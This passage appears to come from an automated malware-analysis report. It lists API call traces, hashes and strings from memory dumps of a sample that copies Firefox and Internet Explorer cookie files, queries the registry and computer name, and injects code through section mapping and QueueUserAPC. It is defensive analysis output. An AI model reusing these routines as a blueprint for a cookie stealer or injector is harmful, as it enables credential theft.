  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
